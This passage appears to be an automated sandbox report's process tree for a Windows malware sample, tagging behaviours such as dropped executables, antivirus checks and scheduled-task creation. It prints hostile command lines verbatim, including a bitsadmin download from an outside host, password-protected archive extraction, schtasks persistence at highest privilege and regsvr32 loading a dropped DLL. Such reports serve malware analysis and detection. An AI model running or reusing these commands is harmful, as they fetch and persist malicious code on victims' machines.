                                              "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2072,15751847945442655653,12830131228461126754,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3284 /prefetch:1
                                              9⤵
                                                PID:6708
                                              • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2072,15751847945442655653,12830131228461126754,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3424 /prefetch:1
                                                9⤵
                                                  PID:6756
                                                • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2072,15751847945442655653,12830131228461126754,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5420 /prefetch:1
                                                  9⤵
                                                  • Checks processor information in registry
                                                  • Enumerates system info in registry
                                                  PID:5024
                                                • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2072,15751847945442655653,12830131228461126754,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5620 /prefetch:1
                                                  9⤵
                                                  • Checks processor information in registry
                                                  • Enumerates system info in registry
                                                  PID:132
                                                • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2072,15751847945442655653,12830131228461126754,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5604 /prefetch:1
                                                  9⤵
                                                    PID:1440
                                                  • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2072,15751847945442655653,12830131228461126754,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5788 /prefetch:1
                                                    9⤵
                                                      PID:2172
                                                    • C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.62\identity_helper.exe
                                                      "C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.62\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2072,15751847945442655653,12830131228461126754,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5176 /prefetch:8
                                                      9⤵
                                                        PID:1316
                                                      • C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.62\identity_helper.exe
                                                        "C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.62\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2072,15751847945442655653,12830131228461126754,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5176 /prefetch:8
                                                        9⤵
                                                          PID:6432
                                                        • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                          "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2072,15751847945442655653,12830131228461126754,131072 --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=5140 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.22000.1 --gpu-preferences=UAAAAAAAAADoAAAQAAAAAAAAAAAAAAAAAABgAAAEAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=3080 /prefetch:2
                                                          9⤵
                                                            PID:2164
                                                          • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                            "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2072,15751847945442655653,12830131228461126754,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=13 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5056 /prefetch:1
                                                            9⤵
                                                              PID:7152
                                                          • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                            "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://www.profitabletrustednetwork.com/b1fsmdd9m?key=7e872dab99d78bffc4aa0c1e6b062dad
                                                            8⤵
                                                              PID:7120
                                                              • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.107 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.62 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7ff9e5fd46f8,0x7ff9e5fd4708,0x7ff9e5fd4718
                                                                9⤵
                                                                  PID:3448
                                                            • C:\Users\Admin\AppData\Local\Temp\26-f72ed-5ab-fec9a-c4f71b439ae50\SHytymuxejo.exe
                                                              "C:\Users\Admin\AppData\Local\Temp\26-f72ed-5ab-fec9a-c4f71b439ae50\SHytymuxejo.exe"
                                                              7⤵
                                                              • Executes dropped EXE
                                                              PID:4652
                                                              • C:\Windows\System32\cmd.exe
                                                                "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\zjiuthze.rw3\GcleanerEU.exe /eufive & exit
                                                                8⤵
                                                                • Suspicious use of SetWindowsHookEx
                                                                PID:3408
                                                              • C:\Windows\System32\cmd.exe
                                                                "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\4a2avad0.kwz\installer.exe /qn CAMPAIGN="654" & exit
                                                                8⤵
                                                                  PID:3332
                                                                  • C:\Users\Admin\AppData\Local\Temp\4a2avad0.kwz\installer.exe
                                                                    C:\Users\Admin\AppData\Local\Temp\4a2avad0.kwz\installer.exe /qn CAMPAIGN="654"
                                                                    9⤵
                                                                    • Loads dropped DLL
                                                                    • Enumerates connected drives
                                                                    • Modifies system certificate store
                                                                    • Suspicious use of FindShellTrayWindow
                                                                    PID:2548
                                                                    • C:\Windows\SysWOW64\msiexec.exe
                                                                      "C:\Windows\system32\msiexec.exe" /i "C:\Users\Admin\AppData\Roaming\AW Manager\Windows Manager 1.0.0\install\97FDF62\Windows Manager - Postback Y.msi" /qn CAMPAIGN=654 AI_SETUPEXEPATH=C:\Users\Admin\AppData\Local\Temp\4a2avad0.kwz\installer.exe SETUPEXEDIR=C:\Users\Admin\AppData\Local\Temp\4a2avad0.kwz\ EXE_CMD_LINE="/exenoupdates /forcecleanup /wintime 1630507832 /qn CAMPAIGN=""654"" " CAMPAIGN="654"
                                                                      10⤵
                                                                      • Enumerates connected drives
                                                                      PID:2128
                                                                • C:\Windows\System32\cmd.exe
                                                                  "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\twbmxfj5.4wx\any.exe & exit
                                                                  8⤵
                                                                  • Executes dropped EXE
                                                                  • Loads dropped DLL
                                                                  PID:5504
                                                                  • C:\Users\Admin\AppData\Local\Temp\twbmxfj5.4wx\any.exe
                                                                    C:\Users\Admin\AppData\Local\Temp\twbmxfj5.4wx\any.exe
                                                                    9⤵
                                                                      PID:5496
                                                                      • C:\Users\Admin\AppData\Local\Temp\twbmxfj5.4wx\any.exe
                                                                        "C:\Users\Admin\AppData\Local\Temp\twbmxfj5.4wx\any.exe" -u
                                                                        10⤵
                                                                        • Loads dropped DLL
                                                                        PID:5068
                                                                  • C:\Windows\System32\cmd.exe
                                                                    "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\pfb2bgn1.ixq\gcleaner.exe /mixfive & exit
                                                                    8⤵
                                                                    • Suspicious use of SetWindowsHookEx
                                                                    PID:1728
                                                                  • C:\Windows\System32\cmd.exe
                                                                    "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\qz1emnyk.wu3\autosubplayer.exe /S & exit
                                                                    8⤵
                                                                      PID:3200
                                                                      • C:\Users\Admin\AppData\Local\Temp\qz1emnyk.wu3\autosubplayer.exe
                                                                        C:\Users\Admin\AppData\Local\Temp\qz1emnyk.wu3\autosubplayer.exe /S
                                                                        9⤵
                                                                        • Drops file in Program Files directory
                                                                        PID:6336
                                                                        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                          powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsl3E1.tmp\tempfile.ps1"
                                                                          10⤵
                                                                            PID:7120
                                                                          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                            powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsl3E1.tmp\tempfile.ps1"
                                                                            10⤵
                                                                              PID:5624
                                                                            • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                              powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsl3E1.tmp\tempfile.ps1"
                                                                              10⤵
                                                                                PID:6140
                                                                              • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsl3E1.tmp\tempfile.ps1"
                                                                                10⤵
                                                                                  PID:6028
                                                                                • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                  powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsl3E1.tmp\tempfile.ps1"
                                                                                  10⤵
                                                                                    PID:7028
                                                                                  • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                    powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsl3E1.tmp\tempfile.ps1"
                                                                                    10⤵
                                                                                      PID:5192
                                                                                    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                      powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsl3E1.tmp\tempfile.ps1"
                                                                                      10⤵
                                                                                      • Checks for any installed AV software in registry
                                                                                      PID:6668
                                                                                    • C:\Windows\SysWOW64\bitsadmin.exe
                                                                                      "bitsadmin" /Transfer helper http://fscloud.su/data/data.7z C:\zip.7z
                                                                                      10⤵
                                                                                      • Download via BitsAdmin
                                                                                      PID:912
                                                                                    • C:\Program Files (x86)\lighteningplayer\data_load.exe
                                                                                      "C:\Program Files (x86)\lighteningplayer\data_load.exe" -pVrfDXva0yyyMOk6 -y x C:\zip.7z -o"C:\Program Files\temp_files\"
                                                                                      10⤵
                                                                                        PID:6928
                                                                                      • C:\Program Files (x86)\lighteningplayer\data_load.exe
                                                                                        "C:\Program Files (x86)\lighteningplayer\data_load.exe" -piU1sZN2lCj49coM -y x C:\zip.7z -o"C:\Program Files\temp_files\"
                                                                                        10⤵
                                                                                          PID:424
                                                                                        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                          powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsl3E1.tmp\tempfile.ps1"
                                                                                          10⤵
                                                                                            PID:5600
                                                                                          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                            powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsl3E1.tmp\tempfile.ps1"
                                                                                            10⤵
                                                                                              PID:6796
                                                                                            • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                              powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsl3E1.tmp\tempfile.ps1"
                                                                                              10⤵
                                                                                                PID:5428
                                                                                              • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsl3E1.tmp\tempfile.ps1"
                                                                                                10⤵
                                                                                                  PID:1196
                                                                                                • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                  powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsl3E1.tmp\tempfile.ps1"
                                                                                                  10⤵
                                                                                                    PID:5124
                                                                                                  • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsl3E1.tmp\tempfile.ps1"
                                                                                                    10⤵
                                                                                                      PID:5932
                                                                                                    • C:\Windows\SysWOW64\WerFault.exe
                                                                                                      C:\Windows\SysWOW64\WerFault.exe -u -p 6336 -s 1540
                                                                                                      10⤵
                                                                                                      • Program crash
                                                                                                      • Checks processor information in registry
                                                                                                      • Enumerates system info in registry
                                                                                                      PID:3216
                                                                                              • C:\Program Files\Windows Media Player\VCHGWOIJAU\foldershare.exe
                                                                                                "C:\Program Files\Windows Media Player\VCHGWOIJAU\foldershare.exe" /VERYSILENT
                                                                                                7⤵
                                                                                                • Suspicious behavior: GetForegroundWindowSpam
                                                                                                PID:1100
                                                                                      • C:\Windows\SysWOW64\schtasks.exe
                                                                                        schtasks /create /f /RU "Admin" /tr "C:\Program Files (x86)\PowerControl\PowerControl_Svc.exe" /tn "PowerControl HR" /sc HOURLY /rl HIGHEST
                                                                                        3⤵
                                                                                        • Checks processor information in registry
                                                                                        • Creates scheduled task(s)
                                                                                        • Enumerates system info in registry
                                                                                        PID:3940
                                                                                      • C:\Windows\SysWOW64\schtasks.exe
                                                                                        schtasks /create /f /RU "Admin" /tr "C:\Program Files (x86)\PowerControl\PowerControl_Svc.exe" /tn "PowerControl LG" /sc ONLOGON /rl HIGHEST
                                                                                        3⤵
                                                                                        • Creates scheduled task(s)
                                                                                        PID:4316
                                                                                    • C:\Users\Admin\Pictures\Adobe Films\ZNI8bKplPziC7FLEsLZFyzD1.exe
                                                                                      "C:\Users\Admin\Pictures\Adobe Films\ZNI8bKplPziC7FLEsLZFyzD1.exe"
                                                                                      2⤵
                                                                                      • Executes dropped EXE
                                                                                      PID:2208
                                                                                    • C:\Users\Admin\Pictures\Adobe Films\40uba9ALppp3uZizoSponZcR.exe
                                                                                      "C:\Users\Admin\Pictures\Adobe Films\40uba9ALppp3uZizoSponZcR.exe"
                                                                                      2⤵
                                                                                      • Executes dropped EXE
                                                                                      • Checks BIOS information in registry
                                                                                      • Checks whether UAC is enabled
                                                                                      PID:428
                                                                                      • C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
                                                                                        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"
                                                                                        3⤵
                                                                                          PID:2516
                                                                                      • C:\Users\Admin\Pictures\Adobe Films\BbcTQM9kCz2wSCp4zL3cjKtX.exe
                                                                                        "C:\Users\Admin\Pictures\Adobe Films\BbcTQM9kCz2wSCp4zL3cjKtX.exe"
                                                                                        2⤵
                                                                                        • Executes dropped EXE
                                                                                        • Loads dropped DLL
                                                                                        PID:5068
                                                                                        • C:\Users\Admin\AppData\Roaming\Calculator\setup.exe
                                                                                          C:\Users\Admin\AppData\Roaming\Calculator\setup.exe -cid= -sid= -silent=1
                                                                                          3⤵
                                                                                          • Executes dropped EXE
                                                                                          • Loads dropped DLL
                                                                                          • Adds Run key to start application
                                                                                          PID:4972
                                                                                          • C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe
                                                                                            "C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" "--cSExK3QD"
                                                                                            4⤵
                                                                                              PID:5504
                                                                                              • C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe
                                                                                                C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Calculator\User Data" /prefetch:7 --monitor-self --monitor-self-argument=--type=crashpad-handler "--monitor-self-argument=--user-data-dir=C:\Users\Admin\AppData\Local\Calculator\User Data" --monitor-self-argument=/prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Calculator\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Calculator\User Data" --annotation=plat=Win64 --annotation=prod=Calculator --annotation=ver=0.0.13 --initial-client-data=0x208,0x20c,0x210,0xd4,0x214,0x7ff9f3afdec0,0x7ff9f3afded0,0x7ff9f3afdee0
                                                                                                5⤵
                                                                                                • Executes dropped EXE
                                                                                                • Loads dropped DLL
                                                                                                PID:2564
                                                                                                • C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe
                                                                                                  C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Calculator\User Data" /prefetch:7 --no-periodic-tasks --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Calculator\User Data\Crashpad" --annotation=plat=Win64 --annotation=prod=Calculator --annotation=ver=0.0.13 --initial-client-data=0x1c0,0x1c4,0x1c8,0x130,0x1cc,0x7ff70d949e70,0x7ff70d949e80,0x7ff70d949e90
                                                                                                  6⤵
                                                                                                  • Executes dropped EXE
                                                                                                  • Loads dropped DLL
                                                                                                  • Adds Run key to start application
                                                                                                  PID:5700
                                                                                              • C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe
                                                                                                "C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" --type=gpu-process --field-trial-handle=1708,6743186004894949023,18218038462160121958,131072 --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Calculator\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw5504_2082571709" --start-stack-profiler --gpu-preferences=MAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAQAAAAAAAAAAAAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAA= --mojo-platform-channel-handle=1724 /prefetch:2
                                                                                                5⤵
                                                                                                • Executes dropped EXE
                                                                                                PID:5364
                                                                                              • C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe
                                                                                                "C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1708,6743186004894949023,18218038462160121958,131072 --lang=en-US --service-sandbox-type=network --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Calculator\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw5504_2082571709" --mojo-platform-channel-handle=1772 /prefetch:8
                                                                                                5⤵
                                                                                                  PID:5792
                                                                                        • C:\Windows\SysWOW64\WerFault.exe
                                                                                          C:\Windows\SysWOW64\WerFault.exe -pss -s 416 -p 1816 -ip 1816
                                                                                          1⤵
                                                                                          • Suspicious use of NtCreateProcessExOtherParentProcess
                                                                                          PID:4136
                                                                                        • C:\Windows\SysWOW64\WerFault.exe
                                                                                          C:\Windows\SysWOW64\WerFault.exe -pss -s 520 -p 2924 -ip 2924
                                                                                          1⤵
                                                                                          • Suspicious use of NtCreateProcessExOtherParentProcess
                                                                                          PID:2172
                                                                                        • C:\Windows\SysWOW64\WerFault.exe
                                                                                          C:\Windows\SysWOW64\WerFault.exe -pss -s 480 -p 1772 -ip 1772
                                                                                          1⤵
                                                                                          • Suspicious use of NtCreateProcessExOtherParentProcess
                                                                                          PID:3164
                                                                                        • C:\Windows\SysWOW64\WerFault.exe
                                                                                          C:\Windows\SysWOW64\WerFault.exe -pss -s 584 -p 3152 -ip 3152
                                                                                          1⤵
                                                                                            PID:3672
                                                                                          • C:\Windows\SysWOW64\WerFault.exe
                                                                                            C:\Windows\SysWOW64\WerFault.exe -pss -s 600 -p 2060 -ip 2060
                                                                                            1⤵
                                                                                            • Suspicious use of NtCreateProcessExOtherParentProcess
                                                                                            PID:3264
                                                                                          • C:\Windows\SysWOW64\WerFault.exe
                                                                                            C:\Windows\SysWOW64\WerFault.exe -pss -s 612 -p 2208 -ip 2208
                                                                                            1⤵
                                                                                            • Suspicious use of NtCreateProcessExOtherParentProcess
                                                                                            PID:4272
                                                                                          • C:\Windows\SysWOW64\WerFault.exe
                                                                                            C:\Windows\SysWOW64\WerFault.exe -pss -s 628 -p 428 -ip 428
                                                                                            1⤵
                                                                                            • Suspicious use of NtCreateProcessExOtherParentProcess
                                                                                            PID:3420
                                                                                          • C:\Windows\SysWOW64\WerFault.exe
                                                                                            C:\Windows\SysWOW64\WerFault.exe -pss -s 708 -p 5100 -ip 5100
                                                                                            1⤵
                                                                                            • Suspicious use of NtCreateProcessExOtherParentProcess
                                                                                            PID:2660
                                                                                          • C:\Windows\SysWOW64\WerFault.exe
                                                                                            C:\Windows\SysWOW64\WerFault.exe -pss -s 472 -p 836 -ip 836
                                                                                            1⤵
                                                                                            • Suspicious use of NtCreateProcessExOtherParentProcess
                                                                                            PID:4448
                                                                                          • C:\Windows\System32\WaaSMedicAgent.exe
                                                                                            C:\Windows\System32\WaaSMedicAgent.exe 6d52b02116cedc57ecfaa504c2afd229 +oSs3/T0h02Xf+XWCTpQJg.0.1.0.3.0
                                                                                            1⤵
                                                                                            • Modifies data under HKEY_USERS
                                                                                            PID:3356
                                                                                            • C:\Windows\System32\Conhost.exe
                                                                                              \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                              2⤵
                                                                                                PID:1816
                                                                                            • C:\Windows\SysWOW64\WerFault.exe
                                                                                              C:\Windows\SysWOW64\WerFault.exe -pss -s 732 -p 4056 -ip 4056
                                                                                              1⤵
                                                                                              • Suspicious use of NtCreateProcessExOtherParentProcess
                                                                                              PID:1448
                                                                                            • C:\Windows\SysWOW64\WerFault.exe
                                                                                              C:\Windows\SysWOW64\WerFault.exe -pss -s 512 -p 2668 -ip 2668
                                                                                              1⤵
                                                                                                PID:3968
                                                                                              • C:\Windows\system32\svchost.exe
                                                                                                C:\Windows\system32\svchost.exe -k netsvcs -p -s wuauserv
                                                                                                1⤵
                                                                                                • Drops file in Windows directory
                                                                                                PID:2312
                                                                                              • C:\Windows\system32\svchost.exe
                                                                                                C:\Windows\system32\svchost.exe -k netsvcs -p -s UsoSvc
                                                                                                1⤵
                                                                                                • Checks processor information in registry
                                                                                                PID:1204
                                                                                                • C:\Windows\uus\AMD64\MoUsoCoreWorker.exe
                                                                                                  C:\Windows\uus\AMD64\MoUsoCoreWorker.exe
                                                                                                  2⤵
                                                                                                    PID:5448
                                                                                                • C:\Windows\SysWOW64\WerFault.exe
                                                                                                  C:\Windows\SysWOW64\WerFault.exe -pss -s 684 -p 784 -ip 784
                                                                                                  1⤵
                                                                                                  • Suspicious use of NtCreateProcessExOtherParentProcess
                                                                                                  PID:5624
                                                                                                • C:\Windows\SysWOW64\WerFault.exe
                                                                                                  C:\Windows\SysWOW64\WerFault.exe -pss -s 720 -p 2796 -ip 2796
                                                                                                  1⤵
                                                                                                  • Suspicious use of NtCreateProcessExOtherParentProcess
                                                                                                  PID:5940
                                                                                                • C:\Windows\SysWOW64\WerFault.exe
                                                                                                  C:\Windows\SysWOW64\WerFault.exe -pss -s 612 -p 2084 -ip 2084
                                                                                                  1⤵
                                                                                                  • Suspicious use of NtCreateProcessExOtherParentProcess
                                                                                                  PID:6004
                                                                                                • C:\Users\Admin\AppData\Local\Temp\AA4A.exe
                                                                                                  C:\Users\Admin\AppData\Local\Temp\AA4A.exe
                                                                                                  1⤵
                                                                                                  • Executes dropped EXE
                                                                                                  • Suspicious use of SetThreadContext
                                                                                                  PID:6084
                                                                                                  • C:\Users\Admin\AppData\Local\Temp\AA4A.exe
                                                                                                    C:\Users\Admin\AppData\Local\Temp\AA4A.exe
                                                                                                    2⤵
                                                                                                    • Executes dropped EXE
                                                                                                    • Checks SCSI registry key(s)
                                                                                                    • Suspicious behavior: MapViewOfSection
                                                                                                    PID:5944
                                                                                                • C:\Users\Admin\AppData\Local\Temp\D97A.exe
                                                                                                  C:\Users\Admin\AppData\Local\Temp\D97A.exe
                                                                                                  1⤵
                                                                                                  • Executes dropped EXE
                                                                                                  • Checks processor information in registry
                                                                                                  • Enumerates system info in registry
                                                                                                  PID:5032
                                                                                                  • C:\Windows\SysWOW64\WerFault.exe
                                                                                                    C:\Windows\SysWOW64\WerFault.exe -u -p 5032 -s 296
                                                                                                    2⤵
                                                                                                    • Program crash
                                                                                                    • Checks processor information in registry
                                                                                                    • Enumerates system info in registry
                                                                                                    PID:2176
                                                                                                • C:\Windows\SysWOW64\WerFault.exe
                                                                                                  C:\Windows\SysWOW64\WerFault.exe -pss -s 352 -p 5032 -ip 5032
                                                                                                  1⤵
                                                                                                  • Suspicious use of NtCreateProcessExOtherParentProcess
                                                                                                  PID:6008
                                                                                                • C:\Users\Admin\AppData\Local\Temp\ED9F.exe
                                                                                                  C:\Users\Admin\AppData\Local\Temp\ED9F.exe
                                                                                                  1⤵
                                                                                                  • Executes dropped EXE
                                                                                                  • Suspicious use of SetThreadContext
                                                                                                  PID:5564
                                                                                                  • C:\Users\Admin\AppData\Local\Temp\ED9F.exe
                                                                                                    C:\Users\Admin\AppData\Local\Temp\ED9F.exe
                                                                                                    2⤵
                                                                                                    • Executes dropped EXE
                                                                                                    PID:3556
                                                                                                • C:\Windows\system32\regsvr32.exe
                                                                                                  regsvr32 /s C:\Users\Admin\AppData\Local\Temp\231.dll
                                                                                                  1⤵
                                                                                                  • Loads dropped DLL
                                                                                                  PID:5176
                                                                                                • C:\Users\Admin\AppData\Local\Temp\1657.exe
                                                                                                  C:\Users\Admin\AppData\Local\Temp\1657.exe
                                                                                                  1⤵
                                                                                                  • Executes dropped EXE
                                                                                                  PID:5048
                                                                                                  • C:\Windows\SysWOW64\WerFault.exe
                                                                                                    C:\Windows\SysWOW64\WerFault.exe -u -p 5048 -s 276
                                                                                                    2⤵
                                                                                                    • Program crash
                                                                                                    • Checks processor information in registry
                                                                                                    • Enumerates system info in registry
                                                                                                    PID:860
                                                                                                • C:\Windows\SysWOW64\WerFault.exe
                                                                                                  C:\Windows\SysWOW64\WerFault.exe -pss -s 564 -p 5048 -ip 5048
                                                                                                  1⤵
                                                                                                  • Suspicious use of NtCreateProcessExOtherParentProcess
                                                                                                  PID:5816
                                                                                                • C:\Users\Admin\AppData\Local\Temp\40C3.exe
                                                                                                  C:\Users\Admin\AppData\Local\Temp\40C3.exe
                                                                                                  1⤵
                                                                                                    PID:3984
                                                                                                    • C:\Windows\SysWOW64\WerFault.exe
                                                                                                      C:\Windows\SysWOW64\WerFault.exe -u -p 3984 -s 276
                                                                                                      2⤵
                                                                                                      • Program crash
                                                                                                      PID:5024
                                                                                                  • C:\Windows\SysWOW64\WerFault.exe
                                                                                                    C:\Windows\SysWOW64\WerFault.exe -pss -s 720 -p 3984 -ip 3984
                                                                                                    1⤵
                                                                                                    • Suspicious use of NtCreateProcessExOtherParentProcess
                                                                                                    PID:3036
                                                                                                  • C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.22000.100_none_04da31ff4c67c24a\TiWorker.exe
                                                                                                    C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.22000.100_none_04da31ff4c67c24a\TiWorker.exe -Embedding
                                                                                                    1⤵
                                                                                                    • Drops file in Windows directory
                                                                                                    PID:2388
                                                                                                  • C:\Users\Admin\AppData\Local\Temp\7BAA.exe
                                                                                                    C:\Users\Admin\AppData\Local\Temp\7BAA.exe
                                                                                                    1⤵
                                                                                                    • Executes dropped EXE
                                                                                                    • Checks BIOS information in registry
                                                                                                    • Loads dropped DLL
                                                                                                    • Checks whether UAC is enabled
                                                                                                    • Suspicious use of SetThreadContext
                                                                                                    PID:5792
                                                                                                    • C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
